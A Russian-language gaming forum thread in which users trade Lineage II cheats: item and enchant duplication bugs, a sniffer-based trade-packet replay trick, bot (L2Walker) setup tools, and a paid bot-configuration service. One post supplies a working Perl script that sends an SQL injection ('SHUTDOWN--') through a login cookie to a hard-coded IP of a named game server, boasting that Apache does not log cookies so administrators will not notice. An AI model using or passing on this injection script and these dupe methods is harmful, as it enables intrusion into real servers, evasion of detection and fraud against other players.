Всё для Lineage

[Rash 6 543]

ладно народ. держите:

Получение волка на элморе:

ask=88434748&reply=1

 

правда давно не проверял, но думаю, работает

 

волк на елморе стоит 200к

[Dama 34]

Rash123

Наверняка гномом играешь, торгашеская морда....

Вот не надо, не надо тут на гномов наезжать

[Гость Nerv]

Dama

А че на них наезжать??? Их мочить надо, чем я и занимался и довольно успешно...

[™K@$PER™ 3]

НЕ ФЛУДИМ!!!!

[Rash 6 543]

тут об ла2 говорим:

http://forum.pushkino.org/index.php?showtopic=256

 

в этой ветке все касаемое багов, программ, ботов и т.д

[Rash 6 543]

http://msfu.net.ru/download/download.php?f...e/engineext.rar

В архиве вы найдете две программы, которые помогут вам узнать токен (token) и версию протокола (protocol version) для того, чтобы подключить бота L2Walker к серверу Lineage.

 

1. EngExt_FE - ищет в файле (не работает с запакованными dll'ками)

(запускаем программу, нажимаем "OPEN", указываем engine.dll)

 

2. EngExt_ME - загружает dll'ку и производит поиск в АП процесса

(копируем программу в папку "System", запускаем, нажимаем "Search")

[Rash 6 543]

Кто-нибкдь проверил баг на елморе на волка? Работает?

[Rash 6 543]

не падать !!!

[Rash 6 543]

С одного известного подолья

1.Пусть ваш друг предложит вам трейд в тот момент когда вы будете использовать сниффер, и поймаете пакет трейда.

2.Когда поймали, предложите трейд вашему другу еще раз.

3.Положите в трейд 1 адену.

4.Теперь посылайте пакет трейда на сервер.

5.После этого закройте окно трейда(У вашего доуга окно трейда будет еще открыто)

6.Положите вещи, которые хотите дюпнуть в ВХ.

7.Предложите трейд вашему другу еще ра, и после того как он подтвердит трейд, вы нажмите Cancel.

---------------------------------

Вообщем покупае л2Сое... покупаешь веап который хочешь точить!!

Ставишь л2Сое на панель быстрого доступа..и открываешь инвент, зажимаешь заточку...наводишь на веап...и делаешь рекол..как только нажал на рекол жди 1секунду, а потом кидай заточку..

---------------------------------

Второй баг это баг с заточками. Механизм действия такой: один чел садится продавать заточку, в момент продажи он кидает её на девайс, который хочет заточить, затем второй эту заточку покупает. Во время продажи, вещь не точится, но когда купивший заточку чел возвращает её владельцу, тому достаточно просто кликнуть на девайс к которому заточка была применена во время её продажи и девайс получает +1. Баг работает без сбоев и разлома затачиваемых вещей. Сегодня на моих глазах были заточены дуалы (не помню какие) на +25 за 5 минут, а затем эти дуалы были раскопированы при помощи вышеописанного бага.

[Rash 6 543]

Опять с подполья

если на вашем сервере не получается сделать инъекцию через сайт стандартными методами (будь то инъекция через страницу регистрации или другие "глючные" скрипты) не отчаивайтесь.

 

возможно на сайте сервера есть "личный кабинет", в который вы входите используя свой логин и пароль (как например на la2.raid.ru или lineageii.ru)

скорее всего сделать инъекцию напрямую через поля login и password сделать не получится, т.к.администраторы наверняка сделали фильтр "зловредных символов"...

но у таких личных кабинетов есть своё уязвимое место

заметим что одинажды зайдя на сайт, он "запоминает" нас делая запись с нашими логином и паролем в кукисы. само собой когда мы в следующий раз зайдем на сайт, браузер автоматически пошлет наш логин и пароль из кукисов...

вот тут администраторы и чаще всего ошибаются, забыв сделать элементарную проверку кукисов, в расчете что пользователь не сможет их править, а зря!

 

ниже приведен скрипт, который посылает наш кукис серверу, в котором содержится инъекция.

язык - perl, думаю срипт можно будет без труда переписать на более близкий к вам по духу язык)

#!/usr/bin/perl -w

use IO::Socket;

use strict;

use CGI;

my $host = '212.33.232.148';

#здесь host - IP сервера на который посылается куки (в нашем случае это рейд)

my $EOL = "\015\012";

my $NL = "%0D%0A";

my $BLANK = $EOL x 2;

my $remote = IO::Socket::INET->new(

Proto => "tcp",

PeerAddr => $host,

PeerPort => "http(80)");

unless ($remote)

{

die "cannot connect to http daemon on $host\n";

}

$remote->autoflush(1);

print

$remote

"GET /index.php HTTP/1.0".$EOL.

"Cookie: login=\'SHUTDOWN--".

$BLANK;

while (0 and <$remote>)

{

print;

# last if $. == 200;

}

close $remote;

у данной инъекции есть один весомый плюс:

апач не пишет в свои логи кукисы, так что сделав инъекцию через них администраторы далеко не сразу поймут через что их взломали

 

Баг:Коро4е инвентарь до 78, покупаем лотырейный билет, покупаем в магазине карту(инвентарь заполнен на 80/80), и тогда билет останется на месте(исправленно, т.к. кое-что перепутал). Баг работает на 100%, если не получается, то руки кривые. Приемлемо для серверов с рейтам х1 и для низко-средне уровневых персов для зарабатывания денег.

[Rash 6 543]

НОВАЯ УСЛУГА:

Настройка бота почти под любой сервак.

[Zer 0]

la2online.ru?

[Rash 6 543]

сори.. именно к мелкософту не могу я даже не знаю туда кто нить бота подключил? Вроде на аллчитсе все просят и никому ничего не говорят

[Zer 0]

если la2online это мелкософт, то я пачка печенья

[Rash 6 543]

если la2online это мелкософт, то я пачка печенья

тьфу. мелкософт это l2online.ru.

 

На том сервере С3?